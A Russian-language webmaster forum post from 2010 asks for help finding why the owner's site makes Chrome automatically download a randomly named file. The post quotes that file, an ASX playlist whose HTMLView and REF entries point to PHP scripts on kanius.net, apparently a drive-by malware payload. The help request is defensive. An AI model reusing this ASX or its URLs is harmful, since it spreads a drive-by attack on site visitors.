вирь/троян/фрейм - помогите найти косяк.

Добрый вечер.

Сегодня пользователь написал о нахождении некой непонятной негативной хрени происходящей с сайтом. Отдельно отмечу, что данный косяк виден только в гугл хроме. Суть:

Есть приличный сайт, вот этот, при заходе на который через гугл хром происходит автоматическое скачивание файла вида

При этом название файла как я понял делает рандомным (если вы зайдёте на сайт через гугл хром, вам будет предложено скачать файл с другим названием).

Внутри данного файла есть следующий код:

<ASX version = "3.0">

	<PARAM name="HTMLView" value="http://kanius.net/zl/29657de9c85d6fd7ea0ddb580e756c2d.php?showuser=25737385&view=Chrome&showforum=s1"/>

	<TITLE>Hello World!</TITLE>

	<AUTHOR>Rasmus</AUTHOR>

	<ENTRY>

		<REF HREF="http://kanius.net/zl/2f17e6f6aebb2496b3823f7159fe74a5.php" />

	</ENTRY>

</ASX>

В других браузерах такого не происходит. Код сайта был мной просмотрен и ничего криминального не обнаружено. Есть один фрейм - это фрейм чата, который стоит уже наверно год. Все скрипты в шапке мне известны и стояли уже давно, в футере только аналитикс и метрика.

Не смотря на то, что скачивание данного файла ни чем не вредит ни пользователю, ни мне - такое поведение сайта само по себе аномально. Буду очень признателен людям, которые либо сталкивались с подобным, либо имеют представление о решении проблемы и отпишутся в этой теме.

P.s.

Возможно в коде есть что-то, что я не заметил и в этом и есть косяк, возможно что-то подгружает данный файл со сторонних ресурсов, возможно ещё что-то. Все места, которые мне известны и факторы из-за которых такое могло бы происходить я проверил, и вроде как всё в норме... Но что-то явно не так.

4fun.fantasy добавил 04.08.2010 в 00:20

Тому, кто найдёт косяк и скажет как его исправить подарю ссылку с сайта навсегда (или просто перечислю 10$, если ссылка вам не подойдёт).